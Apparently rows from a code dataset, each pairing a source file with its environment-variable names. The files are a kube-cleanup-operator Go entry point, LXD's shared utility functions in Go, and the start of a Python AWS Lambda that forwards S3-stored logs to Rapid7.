}); err != nil {
fmt.Printf("Verification result: %s\n", err)
} else {
fmt.Printf("Verification OK\n")
}
}
}
| [
"\"X509_USER_PROXY\""
] | [] | [
"X509_USER_PROXY"
] | [] | ["X509_USER_PROXY"] | go | 1 | 0 | |
cmd/main.go | package main
import (
"flag"
"log"
"os"
"os/signal"
"path/filepath"
"sync"
"time"
"syscall"
"github.com/lwolf/kube-cleanup-operator/pkg/controller"
"k8s.io/client-go/kubernetes"
_ "k8s.io/client-go/plugin/pkg/client/auth/gcp" // TODO: Add all auth providers
_ "k8s.io/client-go/plugin/pkg/client/auth/oidc"
"k8s.io/client-go/tools/clientcmd"
)
func main() {
// Set logging output to standard console out
log.SetOutput(os.Stdout)
sigs := make(chan os.Signal, 1) // Create channel to receive OS signals
stop := make(chan struct{}) // Create channel to receive stop signal
    signal.Notify(sigs, os.Interrupt, syscall.SIGTERM, syscall.SIGINT) // Register the sigs channel to receive SIGTERM and SIGINT
wg := &sync.WaitGroup{} // Goroutines can add themselves to this to be waited on so that they finish
runOutsideCluster := flag.Bool("run-outside-cluster", false, "Set this flag when running outside of the cluster.")
namespace := flag.String("namespace", "", "Watch only this namespaces")
keepSuccess := flag.Duration("keep-successful", 15*time.Minute, "Duration to keep successful jobs, forever if negative, e.g. 1h15m")
keepFailed := flag.Duration("keep-failures", 15*time.Minute, "Duration to keep failed jobs, forever if negative, e.g. 1h15m")
keepPending := flag.Duration("keep-pending", 15*time.Minute, "Duration to keep pending jobs, forever if negative, e.g. 1h15m")
dryRun := flag.Bool("dry-run", false, "Print only, do not delete anything.")
flag.Parse()
// Create clientset for interacting with the kubernetes cluster
clientset, err := newClientSet(*runOutsideCluster)
if err != nil {
log.Fatal(err.Error())
}
options := map[string]time.Duration{
"keepSuccess": *keepSuccess,
"keepFailed": *keepFailed,
"keepPending": *keepPending,
}
if *dryRun {
log.Println("Performing dry run...")
}
log.Printf(
"Provided settings: namespace=%s, dryRun=%t, keepSuccess: %s, keepFailed: %s, keepPending: %s",
*namespace, *dryRun, *keepSuccess, *keepFailed, *keepPending,
)
    wg.Add(1) // add to the WaitGroup before starting the goroutine so Wait() cannot race past a zero counter
    go func() {
        defer wg.Done()
        controller.NewPodController(clientset, *namespace, *dryRun, options).Run(stop)
    }()
log.Printf("Controller started...")
<-sigs // Wait for signals (this hangs until a signal arrives)
log.Printf("Shutting down...")
close(stop) // Tell goroutines to stop themselves
wg.Wait() // Wait for all to be stopped
}
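// newClientSet builds a Kubernetes clientset: when running outside the
// cluster it uses the kubeconfig at $KUBECONFIG (falling back to
// $HOME/.kube/config), otherwise it uses the in-cluster configuration.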
func newClientSet(runOutsideCluster bool) (*kubernetes.Clientset, error) {
kubeConfigLocation := ""
if runOutsideCluster == true {
if os.Getenv("KUBECONFIG") != "" {
kubeConfigLocation = filepath.Join(os.Getenv("KUBECONFIG"))
} else {
homeDir := os.Getenv("HOME")
kubeConfigLocation = filepath.Join(homeDir, ".kube", "config")
}
}
// use the current context in kubeconfig
config, err := clientcmd.BuildConfigFromFlags("", kubeConfigLocation)
if err != nil {
return nil, err
}
return kubernetes.NewForConfig(config)
}
| [
"\"KUBECONFIG\"",
"\"KUBECONFIG\"",
"\"HOME\""
] | [] | [
"HOME",
"KUBECONFIG"
] | [] | ["HOME", "KUBECONFIG"] | go | 2 | 0 | |
shared/util.go | package shared
import (
"bufio"
"bytes"
"context"
"crypto/rand"
"encoding/gob"
"encoding/hex"
"fmt"
"hash"
"io"
"io/ioutil"
"net/http"
"net/url"
"os"
"os/exec"
"path"
"path/filepath"
"reflect"
"regexp"
"runtime"
"strconv"
"strings"
"time"
"github.com/flosch/pongo2"
"github.com/pkg/errors"
"github.com/lxc/lxd/shared/cancel"
"github.com/lxc/lxd/shared/ioprogress"
"github.com/lxc/lxd/shared/units"
)
const SnapshotDelimiter = "/"
const HTTPSDefaultPort = 8443
const HTTPDefaultPort = 8080
const HTTPSMetricsDefaultPort = 9100
// URLEncode encodes a path and query parameters to a URL.
func URLEncode(path string, query map[string]string) (string, error) {
u, err := url.Parse(path)
if err != nil {
return "", err
}
params := url.Values{}
for key, value := range query {
params.Add(key, value)
}
u.RawQuery = params.Encode()
return u.String(), nil
}
// AddSlash adds a slash to the end of paths if they don't already have one.
// This can be useful for rsyncing things, since rsync behaves differently
// depending on the presence or absence of a trailing slash.
func AddSlash(path string) string {
if path[len(path)-1] != '/' {
return path + "/"
}
return path
}
func PathExists(name string) bool {
_, err := os.Lstat(name)
if err != nil && os.IsNotExist(err) {
return false
}
return true
}
// PathIsEmpty checks if the given path is empty.
func PathIsEmpty(path string) (bool, error) {
f, err := os.Open(path)
if err != nil {
return false, err
}
defer f.Close()
// read in ONLY one file
_, err = f.Readdir(1)
// and if the file is EOF... well, the dir is empty.
if err == io.EOF {
return true, nil
}
return false, err
}
// IsDir returns true if the given path is a directory.
func IsDir(name string) bool {
stat, err := os.Stat(name)
if err != nil {
return false
}
return stat.IsDir()
}
// IsUnixSocket returns true if the given path is either a Unix socket
// or a symbolic link pointing at a Unix socket.
func IsUnixSocket(path string) bool {
stat, err := os.Stat(path)
if err != nil {
return false
}
return (stat.Mode() & os.ModeSocket) == os.ModeSocket
}
// HostPathFollow takes a valid path (from HostPath) and resolves it
// all the way to its target or to the last which can be resolved.
func HostPathFollow(path string) string {
// Ignore empty paths
if len(path) == 0 {
return path
}
// Don't prefix stdin/stdout
if path == "-" {
return path
}
// Check if we're running in a snap package.
if !InSnap() {
return path
}
// Handle relative paths
if path[0] != os.PathSeparator {
// Use the cwd of the parent as snap-confine alters our own cwd on launch
ppid := os.Getppid()
if ppid < 1 {
return path
}
pwd, err := os.Readlink(fmt.Sprintf("/proc/%d/cwd", ppid))
if err != nil {
return path
}
path = filepath.Clean(strings.Join([]string{pwd, path}, string(os.PathSeparator)))
}
// Rely on "readlink -m" to do the right thing.
path = HostPath(path)
for {
target, err := RunCommand("readlink", "-m", path)
if err != nil {
return path
}
target = strings.TrimSpace(target)
if path == HostPath(target) {
return path
}
path = HostPath(target)
}
}
// HostPath returns the host path for the provided path
// On a normal system, this does nothing
// When inside of a snap environment, returns the real path
func HostPath(path string) string {
// Ignore empty paths
if len(path) == 0 {
return path
}
// Don't prefix stdin/stdout
if path == "-" {
return path
}
// Check if we're running in a snap package
if !InSnap() {
return path
}
// Handle relative paths
if path[0] != os.PathSeparator {
// Use the cwd of the parent as snap-confine alters our own cwd on launch
ppid := os.Getppid()
if ppid < 1 {
return path
}
pwd, err := os.Readlink(fmt.Sprintf("/proc/%d/cwd", ppid))
if err != nil {
return path
}
path = filepath.Clean(strings.Join([]string{pwd, path}, string(os.PathSeparator)))
}
// Check if the path is already snap-aware
for _, prefix := range []string{"/dev", "/snap", "/var/snap", "/var/lib/snapd"} {
if path == prefix || strings.HasPrefix(path, fmt.Sprintf("%s/", prefix)) {
return path
}
}
return fmt.Sprintf("/var/lib/snapd/hostfs%s", path)
}
// VarPath returns the provided path elements joined by a slash and
// appended to the end of $LXD_DIR, which defaults to /var/lib/lxd.
func VarPath(path ...string) string {
varDir := os.Getenv("LXD_DIR")
if varDir == "" {
varDir = "/var/lib/lxd"
}
items := []string{varDir}
items = append(items, path...)
return filepath.Join(items...)
}
// CachePath returns the directory that LXD should store its cache under. If LXD_DIR is
// set, this path is $LXD_DIR/cache, otherwise it is /var/cache/lxd.
func CachePath(path ...string) string {
varDir := os.Getenv("LXD_DIR")
logDir := "/var/cache/lxd"
if varDir != "" {
logDir = filepath.Join(varDir, "cache")
}
items := []string{logDir}
items = append(items, path...)
return filepath.Join(items...)
}
// LogPath returns the directory that LXD should put logs under. If LXD_DIR is
// set, this path is $LXD_DIR/logs, otherwise it is /var/log/lxd.
func LogPath(path ...string) string {
varDir := os.Getenv("LXD_DIR")
logDir := "/var/log/lxd"
if varDir != "" {
logDir = filepath.Join(varDir, "logs")
}
items := []string{logDir}
items = append(items, path...)
return filepath.Join(items...)
}
func ParseLXDFileHeaders(headers http.Header) (uid int64, gid int64, mode int, type_ string, write string) {
uid, err := strconv.ParseInt(headers.Get("X-LXD-uid"), 10, 64)
if err != nil {
uid = -1
}
gid, err = strconv.ParseInt(headers.Get("X-LXD-gid"), 10, 64)
if err != nil {
gid = -1
}
mode, err = strconv.Atoi(headers.Get("X-LXD-mode"))
if err != nil {
mode = -1
} else {
rawMode, err := strconv.ParseInt(headers.Get("X-LXD-mode"), 0, 0)
if err == nil {
mode = int(os.FileMode(rawMode) & os.ModePerm)
}
}
type_ = headers.Get("X-LXD-type")
/* backwards compat: before "type" was introduced, we could only
* manipulate files
*/
if type_ == "" {
type_ = "file"
}
write = headers.Get("X-LXD-write")
/* backwards compat: before "write" was introduced, we could only
* overwrite files
*/
if write == "" {
write = "overwrite"
}
return uid, gid, mode, type_, write
}
func ReaderToChannel(r io.Reader, bufferSize int) <-chan []byte {
if bufferSize <= 128*1024 {
bufferSize = 128 * 1024
}
ch := make(chan ([]byte))
go func() {
readSize := 128 * 1024
offset := 0
buf := make([]byte, bufferSize)
for {
read := buf[offset : offset+readSize]
nr, err := r.Read(read)
offset += nr
if offset > 0 && (offset+readSize >= bufferSize || err != nil) {
ch <- buf[0:offset]
offset = 0
buf = make([]byte, bufferSize)
}
if err != nil {
close(ch)
break
}
}
}()
return ch
}
// Returns a random base64 encoded string from crypto/rand.
func RandomCryptoString() (string, error) {
buf := make([]byte, 32)
n, err := rand.Read(buf)
if err != nil {
return "", err
}
if n != len(buf) {
return "", fmt.Errorf("not enough random bytes read")
}
return hex.EncodeToString(buf), nil
}
func AtoiEmptyDefault(s string, def int) (int, error) {
if s == "" {
return def, nil
}
return strconv.Atoi(s)
}
func ReadStdin() ([]byte, error) {
buf := bufio.NewReader(os.Stdin)
line, _, err := buf.ReadLine()
if err != nil {
return nil, err
}
return line, nil
}
func WriteAll(w io.Writer, data []byte) error {
buf := bytes.NewBuffer(data)
toWrite := int64(buf.Len())
for {
n, err := io.Copy(w, buf)
if err != nil {
return err
}
toWrite -= n
if toWrite <= 0 {
return nil
}
}
}
// QuotaWriter returns an error once a given write quota gets exceeded.
type QuotaWriter struct {
writer io.Writer
quota int64
n int64
}
// NewQuotaWriter returns a new QuotaWriter wrapping the given writer.
//
// If the given quota is negative, then no quota is applied.
func NewQuotaWriter(writer io.Writer, quota int64) *QuotaWriter {
return &QuotaWriter{
writer: writer,
quota: quota,
}
}
// Write implements the Writer interface.
func (w *QuotaWriter) Write(p []byte) (n int, err error) {
if w.quota >= 0 {
w.n += int64(len(p))
if w.n > w.quota {
return 0, fmt.Errorf("reached %d bytes, exceeding quota of %d", w.n, w.quota)
}
}
return w.writer.Write(p)
}
// FileMove tries to move a file by using os.Rename,
// if that fails it tries to copy the file and remove the source.
func FileMove(oldPath string, newPath string) error {
err := os.Rename(oldPath, newPath)
if err == nil {
return nil
}
err = FileCopy(oldPath, newPath)
if err != nil {
return err
}
os.Remove(oldPath)
return nil
}
// FileCopy copies a file, overwriting the target if it exists.
func FileCopy(source string, dest string) error {
fi, err := os.Lstat(source)
if err != nil {
return err
}
_, uid, gid := GetOwnerMode(fi)
if fi.Mode()&os.ModeSymlink != 0 {
target, err := os.Readlink(source)
if err != nil {
return err
}
if PathExists(dest) {
err = os.Remove(dest)
if err != nil {
return err
}
}
err = os.Symlink(target, dest)
if err != nil {
return err
}
if runtime.GOOS != "windows" {
return os.Lchown(dest, uid, gid)
}
return nil
}
s, err := os.Open(source)
if err != nil {
return err
}
defer s.Close()
d, err := os.Create(dest)
if err != nil {
if os.IsExist(err) {
d, err = os.OpenFile(dest, os.O_WRONLY, fi.Mode())
if err != nil {
return err
}
} else {
return err
}
}
defer d.Close()
_, err = io.Copy(d, s)
if err != nil {
return err
}
/* chown not supported on windows */
if runtime.GOOS != "windows" {
return d.Chown(uid, gid)
}
return nil
}
// DirCopy copies a directory recursively, overwriting the target if it exists.
func DirCopy(source string, dest string) error {
// Get info about source.
info, err := os.Stat(source)
if err != nil {
return errors.Wrapf(err, "failed to get source directory info")
}
if !info.IsDir() {
return fmt.Errorf("source is not a directory")
}
// Remove dest if it already exists.
if PathExists(dest) {
err := os.RemoveAll(dest)
if err != nil {
return errors.Wrapf(err, "failed to remove destination directory %s", dest)
}
}
// Create dest.
err = os.MkdirAll(dest, info.Mode())
if err != nil {
return errors.Wrapf(err, "failed to create destination directory %s", dest)
}
// Copy all files.
entries, err := ioutil.ReadDir(source)
if err != nil {
return errors.Wrapf(err, "failed to read source directory %s", source)
}
for _, entry := range entries {
sourcePath := filepath.Join(source, entry.Name())
destPath := filepath.Join(dest, entry.Name())
if entry.IsDir() {
err := DirCopy(sourcePath, destPath)
if err != nil {
return errors.Wrapf(err, "failed to copy sub-directory from %s to %s", sourcePath, destPath)
}
} else {
err := FileCopy(sourcePath, destPath)
if err != nil {
return errors.Wrapf(err, "failed to copy file from %s to %s", sourcePath, destPath)
}
}
}
return nil
}
type BytesReadCloser struct {
Buf *bytes.Buffer
}
func (r BytesReadCloser) Read(b []byte) (n int, err error) {
return r.Buf.Read(b)
}
func (r BytesReadCloser) Close() error {
/* no-op since we're in memory */
return nil
}
func IsSnapshot(name string) bool {
return strings.Contains(name, SnapshotDelimiter)
}
func MkdirAllOwner(path string, perm os.FileMode, uid int, gid int) error {
// This function is a slightly modified version of MkdirAll from the Go standard library.
// https://golang.org/src/os/path.go?s=488:535#L9
// Fast path: if we can tell whether path is a directory or file, stop with success or error.
dir, err := os.Stat(path)
if err == nil {
if dir.IsDir() {
return nil
}
return fmt.Errorf("path exists but isn't a directory")
}
// Slow path: make sure parent exists and then call Mkdir for path.
i := len(path)
for i > 0 && os.IsPathSeparator(path[i-1]) { // Skip trailing path separator.
i--
}
j := i
for j > 0 && !os.IsPathSeparator(path[j-1]) { // Scan backward over element.
j--
}
if j > 1 {
// Create parent
err = MkdirAllOwner(path[0:j-1], perm, uid, gid)
if err != nil {
return err
}
}
// Parent now exists; invoke Mkdir and use its result.
err = os.Mkdir(path, perm)
err_chown := os.Chown(path, uid, gid)
if err_chown != nil {
return err_chown
}
if err != nil {
// Handle arguments like "foo/." by
// double-checking that directory doesn't exist.
dir, err1 := os.Lstat(path)
if err1 == nil && dir.IsDir() {
return nil
}
return err
}
return nil
}
func StringInSlice(key string, list []string) bool {
for _, entry := range list {
if entry == key {
return true
}
}
return false
}
// StringHasPrefix returns true if value has one of the supplied prefixes.
func StringHasPrefix(value string, prefixes ...string) bool {
for _, prefix := range prefixes {
if strings.HasPrefix(value, prefix) {
return true
}
}
return false
}
func IntInSlice(key int, list []int) bool {
for _, entry := range list {
if entry == key {
return true
}
}
return false
}
func Int64InSlice(key int64, list []int64) bool {
for _, entry := range list {
if entry == key {
return true
}
}
return false
}
func Uint64InSlice(key uint64, list []uint64) bool {
for _, entry := range list {
if entry == key {
return true
}
}
return false
}
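// IsTrue returns true if value is a truthy string: "true", "1", "yes" or
// "on", compared case-insensitively.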
func IsTrue(value string) bool {
return StringInSlice(strings.ToLower(value), []string{"true", "1", "yes", "on"})
}
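// IsFalse returns true if value is a falsy string: "false", "0", "no" or
// "off", compared case-insensitively.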
func IsFalse(value string) bool {
return StringInSlice(strings.ToLower(value), []string{"false", "0", "no", "off"})
}
func IsUserConfig(key string) bool {
return strings.HasPrefix(key, "user.")
}
// StringMapHasStringKey returns true if any of the supplied keys are present in the map.
func StringMapHasStringKey(m map[string]string, keys ...string) bool {
for _, k := range keys {
if _, ok := m[k]; ok {
return true
}
}
return false
}
func IsBlockdev(fm os.FileMode) bool {
return ((fm&os.ModeDevice != 0) && (fm&os.ModeCharDevice == 0))
}
func IsBlockdevPath(pathName string) bool {
sb, err := os.Stat(pathName)
if err != nil {
return false
}
fm := sb.Mode()
return ((fm&os.ModeDevice != 0) && (fm&os.ModeCharDevice == 0))
}
// DeepCopy copies src to dest by using encoding/gob so its not that fast.
func DeepCopy(src, dest interface{}) error {
buff := new(bytes.Buffer)
enc := gob.NewEncoder(buff)
dec := gob.NewDecoder(buff)
if err := enc.Encode(src); err != nil {
return err
}
if err := dec.Decode(dest); err != nil {
return err
}
return nil
}
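// RunningInUserNS returns true if the process appears to be running inside a
// user namespace, detected by checking whether /proc/self/uid_map differs
// from the full-range host mapping "0 0 4294967295".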
func RunningInUserNS() bool {
file, err := os.Open("/proc/self/uid_map")
if err != nil {
return false
}
defer file.Close()
buf := bufio.NewReader(file)
l, _, err := buf.ReadLine()
if err != nil {
return false
}
line := string(l)
var a, b, c int64
fmt.Sscanf(line, "%d %d %d", &a, &b, &c)
if a == 0 && b == 0 && c == 4294967295 {
return false
}
return true
}
// ValidHostname checks the string is valid DNS hostname.
func ValidHostname(name string) error {
// Validate length
if len(name) < 1 || len(name) > 63 {
return fmt.Errorf("Name must be 1-63 characters long")
}
// Validate first character
if strings.HasPrefix(name, "-") {
return fmt.Errorf(`Name must not start with "-" character`)
}
if _, err := strconv.Atoi(string(name[0])); err == nil {
return fmt.Errorf("Name must not be a number")
}
// Validate last character
if strings.HasSuffix(name, "-") {
return fmt.Errorf(`Name must not end with "-" character`)
}
// Validate the character set
match, _ := regexp.MatchString("^[-a-zA-Z0-9]*$", name)
if !match {
return fmt.Errorf("Name can only contain alphanumeric and hyphen characters")
}
return nil
}
// Spawn the editor with a temporary YAML file for editing configs
func TextEditor(inPath string, inContent []byte) ([]byte, error) {
var f *os.File
var err error
var path string
// Detect the text editor to use
editor := os.Getenv("VISUAL")
if editor == "" {
editor = os.Getenv("EDITOR")
if editor == "" {
for _, p := range []string{"editor", "vi", "emacs", "nano"} {
_, err := exec.LookPath(p)
if err == nil {
editor = p
break
}
}
if editor == "" {
return []byte{}, fmt.Errorf("No text editor found, please set the EDITOR environment variable")
}
}
}
if inPath == "" {
// If provided input, create a new file
f, err = ioutil.TempFile("", "lxd_editor_")
if err != nil {
return []byte{}, err
}
err = os.Chmod(f.Name(), 0600)
if err != nil {
f.Close()
os.Remove(f.Name())
return []byte{}, err
}
f.Write(inContent)
f.Close()
path = fmt.Sprintf("%s.yaml", f.Name())
os.Rename(f.Name(), path)
defer os.Remove(path)
} else {
path = inPath
}
cmdParts := strings.Fields(editor)
cmd := exec.Command(cmdParts[0], append(cmdParts[1:], path)...)
cmd.Stdin = os.Stdin
cmd.Stdout = os.Stdout
cmd.Stderr = os.Stderr
err = cmd.Run()
if err != nil {
return []byte{}, err
}
content, err := ioutil.ReadFile(path)
if err != nil {
return []byte{}, err
}
return content, nil
}
func ParseMetadata(metadata interface{}) (map[string]interface{}, error) {
newMetadata := make(map[string]interface{})
s := reflect.ValueOf(metadata)
if !s.IsValid() {
return nil, nil
}
if s.Kind() == reflect.Map {
for _, k := range s.MapKeys() {
if k.Kind() != reflect.String {
return nil, fmt.Errorf("Invalid metadata provided (key isn't a string)")
}
newMetadata[k.String()] = s.MapIndex(k).Interface()
}
} else if s.Kind() == reflect.Ptr && !s.Elem().IsValid() {
return nil, nil
} else {
return nil, fmt.Errorf("Invalid metadata provided (type isn't a map)")
}
return newMetadata, nil
}
// RemoveDuplicatesFromString removes all duplicates of the string 'sep'
// from the specified string 's'. Leading and trailing occurrences of sep
// are NOT removed (duplicate leading/trailing are). Performs poorly if
// there are multiple consecutive redundant separators.
func RemoveDuplicatesFromString(s string, sep string) string {
dup := sep + sep
for s = strings.Replace(s, dup, sep, -1); strings.Contains(s, dup); s = strings.Replace(s, dup, sep, -1) {
}
return s
}
type RunError struct {
msg string
Err error
Stdout string
Stderr string
}
func (e RunError) Error() string {
return e.msg
}
// RunCommandSplit runs a command with a supplied environment and optional arguments and returns the
// resulting stdout and stderr output as separate variables. If the supplied environment is nil then
// the default environment is used. If the command fails to start or returns a non-zero exit code
// then an error is returned containing the output of stderr too.
func RunCommandSplit(env []string, filesInherit []*os.File, name string, arg ...string) (string, string, error) {
cmd := exec.Command(name, arg...)
if env != nil {
cmd.Env = env
}
if filesInherit != nil {
cmd.ExtraFiles = filesInherit
}
var stdout bytes.Buffer
var stderr bytes.Buffer
cmd.Stdout = &stdout
cmd.Stderr = &stderr
err := cmd.Run()
if err != nil {
err := RunError{
msg: fmt.Sprintf("Failed to run: %s %s: %s", name, strings.Join(arg, " "), strings.TrimSpace(stderr.String())),
Stdout: stdout.String(),
Stderr: stderr.String(),
Err: err,
}
return stdout.String(), stderr.String(), err
}
return stdout.String(), stderr.String(), nil
}
// RunCommand runs a command with optional arguments and returns stdout. If the command fails to
// start or returns a non-zero exit code then an error is returned containing the output of stderr.
func RunCommand(name string, arg ...string) (string, error) {
stdout, _, err := RunCommandSplit(nil, nil, name, arg...)
return stdout, err
}
// RunCommandInheritFds runs a command with optional arguments and passes a set
// of file descriptors to the newly created process, returning stdout. If the
// command fails to start or returns a non-zero exit code then an error is
// returned containing the output of stderr.
func RunCommandInheritFds(filesInherit []*os.File, name string, arg ...string) (string, error) {
stdout, _, err := RunCommandSplit(nil, filesInherit, name, arg...)
return stdout, err
}
// RunCommandCLocale runs a command with a LANG=C.UTF-8 environment set with optional arguments and
// returns stdout. If the command fails to start or returns a non-zero exit code then an error is
// returned containing the output of stderr.
func RunCommandCLocale(name string, arg ...string) (string, error) {
stdout, _, err := RunCommandSplit(append(os.Environ(), "LANG=C.UTF-8"), nil, name, arg...)
return stdout, err
}
func RunCommandWithFds(stdin io.Reader, stdout io.Writer, name string, arg ...string) error {
cmd := exec.Command(name, arg...)
if stdin != nil {
cmd.Stdin = stdin
}
if stdout != nil {
cmd.Stdout = stdout
}
var buffer bytes.Buffer
cmd.Stderr = &buffer
err := cmd.Run()
if err != nil {
err := RunError{
msg: fmt.Sprintf("Failed to run: %s %s: %s", name, strings.Join(arg, " "),
strings.TrimSpace(buffer.String())),
Err: err,
Stderr: buffer.String(),
}
return err
}
return nil
}
// TryRunCommand runs the specified command up to 20 times with a 500ms delay between each call
// until it runs without an error. If after 20 times it is still failing then returns the error.
func TryRunCommand(name string, arg ...string) (string, error) {
var err error
var output string
for i := 0; i < 20; i++ {
output, err = RunCommand(name, arg...)
if err == nil {
break
}
time.Sleep(500 * time.Millisecond)
}
return output, err
}
func TimeIsSet(ts time.Time) bool {
if ts.Unix() <= 0 {
return false
}
if ts.UTC().Unix() <= 0 {
return false
}
return true
}
// EscapePathFstab escapes a path fstab-style.
// This ensures that getmntent_r() and friends can correctly parse stuff like
// /some/wacky path with spaces /some/wacky target with spaces
func EscapePathFstab(path string) string {
r := strings.NewReplacer(
" ", "\\040",
"\t", "\\011",
"\n", "\\012",
"\\", "\\\\")
return r.Replace(path)
}
func SetProgressMetadata(metadata map[string]interface{}, stage, displayPrefix string, percent, processed, speed int64) {
progress := make(map[string]string)
// stage, percent, speed sent for API callers.
progress["stage"] = stage
if processed > 0 {
progress["processed"] = strconv.FormatInt(processed, 10)
}
if percent > 0 {
progress["percent"] = strconv.FormatInt(percent, 10)
}
progress["speed"] = strconv.FormatInt(speed, 10)
metadata["progress"] = progress
// <stage>_progress with formatted text sent for lxc cli.
if percent > 0 {
metadata[stage+"_progress"] = fmt.Sprintf("%s: %d%% (%s/s)", displayPrefix, percent, units.GetByteSizeString(speed, 2))
} else if processed > 0 {
metadata[stage+"_progress"] = fmt.Sprintf("%s: %s (%s/s)", displayPrefix, units.GetByteSizeString(processed, 2), units.GetByteSizeString(speed, 2))
} else {
metadata[stage+"_progress"] = fmt.Sprintf("%s: %s/s", displayPrefix, units.GetByteSizeString(speed, 2))
}
}
func DownloadFileHash(ctx context.Context, httpClient *http.Client, useragent string, progress func(progress ioprogress.ProgressData), canceler *cancel.Canceler, filename string, url string, hash string, hashFunc hash.Hash, target io.WriteSeeker) (int64, error) {
// Always seek to the beginning
target.Seek(0, 0)
var req *http.Request
var err error
// Prepare the download request
if ctx != nil {
req, err = http.NewRequestWithContext(ctx, "GET", url, nil)
} else {
req, err = http.NewRequest("GET", url, nil)
}
if err != nil {
return -1, err
}
if useragent != "" {
req.Header.Set("User-Agent", useragent)
}
// Perform the request
r, doneCh, err := cancel.CancelableDownload(canceler, httpClient, req)
if err != nil {
return -1, err
}
defer r.Body.Close()
defer close(doneCh)
if r.StatusCode != http.StatusOK {
return -1, fmt.Errorf("Unable to fetch %s: %s", url, r.Status)
}
// Handle the data
body := r.Body
if progress != nil {
body = &ioprogress.ProgressReader{
ReadCloser: r.Body,
Tracker: &ioprogress.ProgressTracker{
Length: r.ContentLength,
Handler: func(percent int64, speed int64) {
if filename != "" {
progress(ioprogress.ProgressData{Text: fmt.Sprintf("%s: %d%% (%s/s)", filename, percent, units.GetByteSizeString(speed, 2))})
} else {
progress(ioprogress.ProgressData{Text: fmt.Sprintf("%d%% (%s/s)", percent, units.GetByteSizeString(speed, 2))})
}
},
},
}
}
var size int64
if hashFunc != nil {
size, err = io.Copy(io.MultiWriter(target, hashFunc), body)
if err != nil {
return -1, err
}
result := fmt.Sprintf("%x", hashFunc.Sum(nil))
if result != hash {
return -1, fmt.Errorf("Hash mismatch for %s: %s != %s", url, result, hash)
}
} else {
size, err = io.Copy(target, body)
if err != nil {
return -1, err
}
}
return size, nil
}
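// ParseNumberFromFile reads the file and parses its whitespace-trimmed
// contents as a base-10 integer.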
func ParseNumberFromFile(file string) (int64, error) {
f, err := os.Open(file)
if err != nil {
return int64(0), err
}
defer f.Close()
buf := make([]byte, 4096)
n, err := f.Read(buf)
if err != nil {
return int64(0), err
}
str := strings.TrimSpace(string(buf[0:n]))
nr, err := strconv.Atoi(str)
if err != nil {
return int64(0), err
}
return int64(nr), nil
}
type ReadSeeker struct {
io.Reader
io.Seeker
}
func NewReadSeeker(reader io.Reader, seeker io.Seeker) *ReadSeeker {
return &ReadSeeker{Reader: reader, Seeker: seeker}
}
func (r *ReadSeeker) Read(p []byte) (n int, err error) {
return r.Reader.Read(p)
}
func (r *ReadSeeker) Seek(offset int64, whence int) (int64, error) {
return r.Seeker.Seek(offset, whence)
}
// RenderTemplate renders a pongo2 template.
func RenderTemplate(template string, ctx pongo2.Context) (string, error) {
// Load template from string
tpl, err := pongo2.FromString("{% autoescape off %}" + template + "{% endautoescape %}")
if err != nil {
return "", err
}
// Get rendered template
ret, err := tpl.Execute(ctx)
if err != nil {
return ret, err
}
// Looks like we're nesting templates so run pongo again
if strings.Contains(ret, "{{") || strings.Contains(ret, "{%") {
return RenderTemplate(ret, ctx)
}
return ret, err
}
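// GetSnapshotExpiry parses a snapshot expiry expression such as
// "1M 2H 3d 4w 5m 6y" (minutes, hours, days, weeks, months, years; each
// field may appear at most once) and returns refDate shifted by that amount.
// An empty expression yields the zero time.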
func GetSnapshotExpiry(refDate time.Time, s string) (time.Time, error) {
expr := strings.TrimSpace(s)
if expr == "" {
return time.Time{}, nil
}
re := regexp.MustCompile(`^(\d+)(M|H|d|w|m|y)$`)
expiry := map[string]int{
"M": 0,
"H": 0,
"d": 0,
"w": 0,
"m": 0,
"y": 0,
}
values := strings.Split(expr, " ")
if len(values) == 0 {
return time.Time{}, nil
}
for _, value := range values {
fields := re.FindStringSubmatch(value)
if fields == nil {
return time.Time{}, fmt.Errorf("Invalid expiry expression")
}
if expiry[fields[2]] > 0 {
// We don't allow fields to be set multiple times
return time.Time{}, fmt.Errorf("Invalid expiry expression")
}
val, err := strconv.Atoi(fields[1])
if err != nil {
return time.Time{}, err
}
expiry[fields[2]] = val
}
t := refDate.AddDate(expiry["y"], expiry["m"], expiry["d"]+expiry["w"]*7).Add(
time.Hour*time.Duration(expiry["H"]) + time.Minute*time.Duration(expiry["M"]))
return t, nil
}
// InSnap returns true if we're running inside the LXD snap.
func InSnap() bool {
// Detect the snap.
_, snapPath := os.LookupEnv("SNAP")
snapName := os.Getenv("SNAP_NAME")
if snapPath && snapName == "lxd" {
return true
}
return false
}
// JoinUrls returns the join of the input base URL and path, sanitized.
func JoinUrls(baseUrl, p string) (string, error) {
u, err := url.Parse(baseUrl)
if err != nil {
return "", err
}
u.Path = path.Join(u.Path, p)
return u.String(), nil
}
| [
"\"LXD_DIR\"",
"\"LXD_DIR\"",
"\"LXD_DIR\"",
"\"VISUAL\"",
"\"EDITOR\"",
"\"SNAP_NAME\""
] | [] | [
"VISUAL",
"EDITOR",
"SNAP_NAME",
"LXD_DIR"
] | [] | ["VISUAL", "EDITOR", "SNAP_NAME", "LXD_DIR"] | go | 4 | 0 | |
le_lambda.py | import gzip
import logging
import tempfile
import boto3
import socket
import ssl
import re
import urllib
import csv
import zlib
import json
import certifi
import os
import hashlib
from collections import OrderedDict
from uuid import UUID
logger = logging.getLogger()
logger.setLevel(logging.INFO)
logger.info('Loading function...')
s3 = boto3.client('s3')
REGION = os.environ.get('region')
ENDPOINT = '{}.data.logs.insight.rapid7.com'.format(REGION)
PORT = 20000
TOKEN = os.environ.get('token')
SALT = os.environ.get('salt')
def lambda_handler(event, context):
sock = create_socket()
if not validate_uuid(TOKEN):
logger.critical('{} is not a valid token. Exiting.'.format(TOKEN))
raise SystemExit
else:
# Get the object from the event and show its content type
bucket = event['Records'][0]['s3']['bucket']['name']
key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key']).decode('utf8')
try:
response = s3.get_object(Bucket=bucket, Key=key)
logger.info('Fetched file {} from S3 bucket {}'.format(key, bucket))
body = response['Body']
data = body.read()
# If the name has a .gz extension, then decompress the data
if key[-3:] == '.gz':
with tempfile.TemporaryFile() as temporary_file:
temporary_file.write(data)
temporary_file.seek(0)
with gzip.GzipFile(fileobj=temporary_file, mode="r") as gz:
data = gz.read()
lines = data.split("\n")
            logger.info('Total number of lines: {}'.format(len(lines)))
if validate_elb_log(str(key)) is True:
# timestamp elb client:port backend:port request_processing_time backend_processing_time
# response_processing_time elb_status_code backend_status_code received_bytes sent_bytes
# "request" "user_agent" ssl_cipher ssl_protocol
logger.info('File={} is AWS ELB log format. Parsing and sending to R7'.format(key))
